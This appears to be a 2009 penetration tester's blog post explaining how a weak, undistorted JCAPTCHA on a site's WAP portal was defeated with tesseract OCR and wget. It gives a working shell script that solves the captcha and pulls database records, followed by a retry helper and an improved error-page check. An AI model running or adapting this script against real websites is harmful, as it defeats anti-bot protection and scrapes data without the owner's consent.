Tuesday, January 6, 2009

Captcha circumvention

Last week I was trying to bypass a captcha implementation (JCAPTCHA) on a website I was hired to pentest. Although captchas can be very difficult to bypass, I found a "weak link" in the WAP portion of the portal in question: the letters shown in the image had no distortion at all, and by abusing that I could extract a significant portion of the data.


It turns out there is an OCR (optical character recognition) tool for Linux, tesseract, capable of "reading" the image shown to the user and writing the recognized characters to a text file.
With wget we can issue HTTP requests to a website, save and load cookies, and write data to the filesystem. Putting it all together, we get a shell script that circumvents the captcha protection and extracts the data automatically (it succeeds around 60% of the time).

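#!/bin/sh
# Value to look up, taken from the first argument
query="$1"

# Fetch the captcha image and keep the session cookie it is tied to
wget http://www.somesite.com/jcaptcha --save-cookies cookies.txt --keep-session-cookies -O /tmp/captcha.jpg 2> /dev/null
# Convert the JPEG to a grayscale TIFF for tesseract
djpeg -grayscale /tmp/captcha.jpg | convert - /tmp/captcha.tiff
# OCR the image; tesseract writes its result to jcaptcha.txt
tesseract /tmp/captcha.tiff jcaptcha
# Strip whitespace and newlines from the OCR output
cap=$(tr -d '[:space:]' < jcaptcha.txt)
# Submit the query with the recognized captcha, reusing the same session
wget "http://www.somesite.com/servlet?niv=&nrpv=&query=$query&captcha=$cap" --load-cookies cookies.txt -O salida.txt 2> /dev/null
# Size of the response in bytes
tam=$(wc -c < salida.txt | tr -d ' ')
echo "$tam"
# The error page is 701 bytes; anything else is treated as extracted data
if [ "$tam" -ne 701 ]; then
    mv salida.txt "$query.txt"
fi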
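
Since a single attempt only succeeds around 60% of the time, it makes sense to repeat the whole sequence until the captcha is read correctly. Here is a rough sketch of a generic retry helper. The names retry and attempt_query are mine, not part of the PoC, and attempt_query is assumed to wrap the steps above and exit 0 only when the response is not the error page.

```shell
#!/bin/sh
# retry MAX CMD [ARGS...]: run CMD until it exits 0, at most MAX times.
# Returns 0 on the first success, 1 if every attempt failed.
retry() {
    max=$1
    shift
    n=1
    while [ "$n" -le "$max" ]; do
        if "$@"; then
            return 0
        fi
        n=$((n + 1))
    done
    return 1
}

# Hypothetical usage (attempt_query is an assumed wrapper, not shown here):
# retry 5 attempt_query "$query"
```

Every attempt has to fetch a fresh captcha image and a fresh session cookie, so the wrapper should run all the steps again, not just the final request.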

You may wonder why the script uses a length of 701 bytes to detect whether the captcha has been defeated. It simply assumes that the default "error" page is 701 bytes long; a response of any other length is assumed to be data extracted from the database (OK, it's not the best approach, but it's just a PoC).
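
A slightly sturdier check, still only a sketch, is to compare the response against a saved copy of the error page instead of relying on its size. The function name is_error_page and the file error_page.txt are assumptions of mine; the reference copy would have to be captured once by submitting a deliberately wrong captcha, and this only works if the error page is static.

```shell
#!/bin/sh
# is_error_page RESPONSE REFERENCE
# Exits 0 when RESPONSE is byte-for-byte identical to REFERENCE
# (a saved copy of the known error page), non-zero otherwise.
is_error_page() {
    cmp -s "$1" "$2"
}

# Hypothetical usage with the files from the PoC:
# if ! is_error_page salida.txt error_page.txt; then
#     mv salida.txt "$query.txt"
# fi
```

Unlike the size test, this does not mistake a real result that happens to be 701 bytes long for the error page.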